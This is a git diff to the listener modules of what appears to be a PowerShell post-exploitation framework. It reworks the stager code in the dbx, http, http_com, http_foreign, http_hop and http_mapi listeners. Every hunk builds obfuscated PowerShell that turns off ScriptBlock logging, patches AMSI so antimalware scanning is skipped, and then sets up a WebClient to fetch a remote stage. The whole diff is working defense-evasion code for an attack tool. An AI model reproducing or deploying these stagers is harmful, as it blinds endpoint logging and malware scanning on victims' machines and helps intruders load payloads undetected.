diff --git a/lib/listeners/dbx.py b/lib/listeners/dbx.py index 5bf5d73..99aabd9 100755 --- a/lib/listeners/dbx.py +++ b/lib/listeners/dbx.py @@ -175,15 +175,22 @@ class Listener: stager = '' if safeChecks.lower() == 'true': + stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") + # ScriptBlock Logging bypass - stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") + stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") - stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" - stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" - stager += helpers.randomize_capitalization("$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" + stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").GetValue($null);If($GPS") + stager += "['ScriptB'+'lockLogging']" + stager += helpers.randomize_capitalization("){$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" + stager += helpers.randomize_capitalization("$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" + stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") + stager += "'signatures','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}") # @mattifestation's AMSI bypass stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") @@ -191,6 +198,7 @@ class Listener: stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += "'amsiInitFailed','NonPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,$true)};") + stager += "}" stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 3f45d37..3bae03a 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -192,15 +192,22 @@ class Listener: stager = '' if safeChecks.lower() == 'true': + stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") + # ScriptBlock Logging bypass - stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") + stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") - stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" - stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" - stager += helpers.randomize_capitalization("$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" + stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").GetValue($null);If($GPS") + stager += "['ScriptB'+'lockLogging']" + stager += helpers.randomize_capitalization("){$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" + stager += helpers.randomize_capitalization("$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" + stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") + stager += "'signatures','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}") # @mattifestation's AMSI bypass stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") @@ -208,6 +215,7 @@ class Listener: stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += "'amsiInitFailed','NonPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,$true)};") + stager += "}" stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py index af31ac8..819d62e 100644 --- a/lib/listeners/http_com.py +++ b/lib/listeners/http_com.py @@ -172,15 +172,22 @@ class Listener: stager = '' if safeChecks.lower() == 'true': + stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") + # ScriptBlock Logging bypass - stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") + stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") - stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" - stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" - stager += helpers.randomize_capitalization("$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" + stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").GetValue($null);If($GPS") + stager += "['ScriptB'+'lockLogging']" + stager += helpers.randomize_capitalization("){$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" + stager += helpers.randomize_capitalization("$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" + stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") + stager += "'signatures','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}") # @mattifestation's AMSI bypass stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") @@ -188,6 +195,7 @@ class Listener: stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += "'amsiInitFailed','NonPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,$true)};") + stager += "}" stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") # TODO: reimplement stager retries? diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py index 557626e..0ab6a8b 100644 --- a/lib/listeners/http_foreign.py +++ b/lib/listeners/http_foreign.py @@ -147,15 +147,22 @@ class Listener: stager = '' if safeChecks.lower() == 'true': + stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") + # ScriptBlock Logging bypass - stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") + stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") - stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" - stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" - stager += helpers.randomize_capitalization("$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" + stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").GetValue($null);If($GPS") + stager += "['ScriptB'+'lockLogging']" + stager += helpers.randomize_capitalization("){$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" + stager += helpers.randomize_capitalization("$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" + stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") + stager += "'signatures','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}") # @mattifestation's AMSI bypass stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") @@ -163,6 +170,7 @@ class Listener: stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += "'amsiInitFailed','NonPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,$true)};") + stager += "}" stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py index c5a7757..092ee14 100644 --- a/lib/listeners/http_hop.py +++ b/lib/listeners/http_hop.py @@ -126,15 +126,22 @@ class Listener: stager = '' if safeChecks.lower() == 'true': + stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") + # ScriptBlock Logging bypass - stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") + stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") - stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" - stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" - stager += helpers.randomize_capitalization("$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" + stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").GetValue($null);If($GPS") + stager += "['ScriptB'+'lockLogging']" + stager += helpers.randomize_capitalization("){$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" + stager += helpers.randomize_capitalization("$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" + stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") + stager += "'signatures','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}") # @mattifestation's AMSI bypass stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") @@ -142,6 +149,7 @@ class Listener: stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += "'amsiInitFailed','NonPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,$true)};") + stager += "}" stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") diff --git a/lib/listeners/http_mapi.py b/lib/listeners/http_mapi.py index e53ac3b..5995b5c 100644 --- a/lib/listeners/http_mapi.py +++ b/lib/listeners/http_mapi.py @@ -175,15 +175,23 @@ class Listener: stager = '' if safeChecks.lower() == 'true': + stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") + # ScriptBlock Logging bypass - stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") + stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") - stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" - stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" - stager += helpers.randomize_capitalization("$GroupPolicySettings") - stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" + stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").GetValue($null);If($GPS") + stager += "['ScriptB'+'lockLogging']" + stager += helpers.randomize_capitalization("){$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" + stager += helpers.randomize_capitalization("$GPS") + stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" + stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") + stager += "'signatures','N'+'onPublic,Static'" + stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}") + stager += "}" # @mattifestation's AMSI bypass stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')